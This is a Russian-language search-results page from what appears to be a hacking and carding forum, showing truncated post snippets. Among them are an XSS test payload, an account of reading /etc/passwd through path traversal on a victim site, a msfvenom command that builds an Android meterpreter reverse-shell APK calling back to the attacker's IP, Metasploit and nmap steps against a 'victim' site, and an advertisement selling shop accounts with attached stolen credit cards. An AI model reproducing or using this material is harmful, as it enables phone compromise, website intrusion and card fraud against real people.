Результаты поиска

В данной "книге" хорошо расписано о том как обходить WAF https://yadi.sk/i/1lBWP39e36yPba

Пассивная уязвимость уже требует каких либо действий со стороны жертвы, надо будет чтобы жертва перешла по сформированной нами ссылке, чтобы получить куки.Пример пассивной XSS: На сайте есть строка поиска информации по сайту, при вводе яваскрипт кода в этой строке, также выскакивает окно. Это...

Для того, чтобы найти XSS на сайте, нужно вводить даный яваскрипт код во всех доступных формах для ввода на сайте: <script>alert(hacked)</script> Увидите что выскочило окошко hacked,значит уязвимость на данном сайте присутствует. XSS уязвимости бывают 2х видов, пассивные и активные. Мы...

Спасибо,p.s сори за набив

Уязвимость была обнаружена.Я зашел на сайт,посмотрел чем отличаются страницы phpinfo.php,test.php,menu.php,index.php.Посмотрел phpinfo.php,определил в какой директории находиться etc/passwd,путь был таков var/www/html/ ,соответственно я понял что до passwd 4 перехода,на index.php не было...

Пусть плюсанут те кто участвует ))

Все что душе угодно)

Продаю аккаунты с привязанными сс, магазин приватный,в нём только одежда!!! От таких производителей как (Tommy Helfiger,Adidas,Nike,Reebok и тд). Акаунты почти все с USA. Так же имеется магазин с одеждой TheNorthFace. Цена за 1шт:4$,продаю только оптом! Контактные данные:скайп poxi.poxi2, либо...

Как ломается связка из публичных VPN Серверов: Связка: Double VPN (New York - Berlin) =VMWare=Dedic Возьмем в пример что вы вбили какой либо товар, залили чтолибо и любое действие. - Владелец шопа, успешно залогинил ваше посещение, знает с какого айпи вы заходили а так же всю необходимую инфу...

1. Попросите об одолжении Мы говорим об эффекте, известном как эффект Бенджамина Франклина. Однажды Франклину понадобилось завоевать расположение человека, который его очень не любил. Тогда Франклин вежливо попросил этого человека одолжить ему редкую книгу и, получив желаемое, ещё более вежливо...

Хотел бы немного рассказать об хакерских утилитах на ОС Android. Многие ей интересуются, но на форуме информации о ней мало. Данная ось очень удобна своей портативностью, ПК вы не везде с собой таскаете))) Вот несколько программ, думаю вам будут интересны, ну думаю про Root права рассказывать не...

Добавление пользователя Kali Linux: Откройте терминал и напечатайте туда следующее для создания нового пользователя (замените mial на желаемое имя пользователя): useradd -m mial (Примечание: -m означает создание домашней директории, которой обычно является /home/имя_пользователя) Теперь...

Пароль root в Kali Linux Как правило, пароль мы задаём сами при установке системы. Бывают исключения — например, при прожиге на флешку live-образа, либо при установке ARM-версий Kali Linux. В любом случае для начала, попробуйте пароль: toor Если забыл пароль от Kali Linux Небольшие неприятности...

Команды Linux для управления файлами 1. ls Утилита для просмотра содержимого каталогов. По умолчанию показывает текущий каталог. Если в параметрах передать путь, то она перечислит содержимое того каталога. Полезные опции -l (List) и -a (All). Первая форматирует вывод в виде списка с более...

Руткиты (rootkit) — это вредоносные программы, созданные для получения доступа уровня рута, при этом они прячут своё присутствие от антивирусных программ. Обычно руткиты устнавливаются на вашу систему троянами, содержащимися вместе с загруженными файлами, через известные системные уязвимости...

что за задарма?

DIRB — это сканер веб-контента. Он ищет существующие (возможно, скрытые) веб-объекты. В основе его работы лежит поиск по словарю, он формирует запросы к веб-серверу и анализирует ответ. DIRB поставляется с набором настроенных на атаку словарей для простого использования, но вы можете...

WordPress завоевал заслуженную популярность. Каждый день запускается огромное количество новых сайтов на этом движке. Быстрее самого WordPress распространяются только дыры в скриптах, поскольку эти дыры могут быть не только в коде движка, но и в любом из огромного количества его плагинов и даже...

Всякий раз, когда компьютер начинает вести себя странно и перестает слушаться, первое, что приходит в голову — не заразился ли компьютер "вирусом". В таком случае страхи могут оказаться небезосновательными. Следовательно, желательно узнать об этих врагах компьютера и получить общее представление...

чего такой большой хайд?

Гайд будет не очень большой,но многим он должен помочь.Итак приступим. После того как вы просканили ваш сайт(жертву) на наличие открытых портов и сервисов которые на них висят,приступаем к самому metasploit. Как его запустить? 1) service postgresql start 2) msfdb init 3) msfconsole Далее мы...

ПРЕДМЕТ КРИПТОЛОГИИ Описание предмета криптологии начнем с доуточнения обиходного понятия информация. Иностранному термину информация достаточно близко отвечает русское слово смысл. Очевидно, что одну и ту же информацию можно передать разными сообщениями, например, на разных языках, а также...

Из-за своего размера и космической цены, долгое время компьютеры были недоступны простым людям. Компанию IBM, владеющую в 50х гг. 95% всего компьютерного рынка, вполне устраивали многомиллионные продажи и правительственная клиентура. Поэтому ее руководство даже не пыталось начать разработки...

Установка и использование msfvenom payload: 1. Запустите kali и откройте панель управления. 2. Установите payload и создайте всплывающее окно пользователя вот этой командой: msfvenom -p android/meterpreter/reverse_tcp LHOST=указываем свой ip LPORT=4444 R > android.apk Файл apk сохранен в...

Собираем информацию об открытых на сервере портах, запущенных службах и версиях программного обеспечения Это простая команда может использоваться для проверки доступен ли сайт (в данном случае я использовал сайт codeby.net). Обращаем внимание на открытые порты: nmap -sS [IPадрес] или [адрес...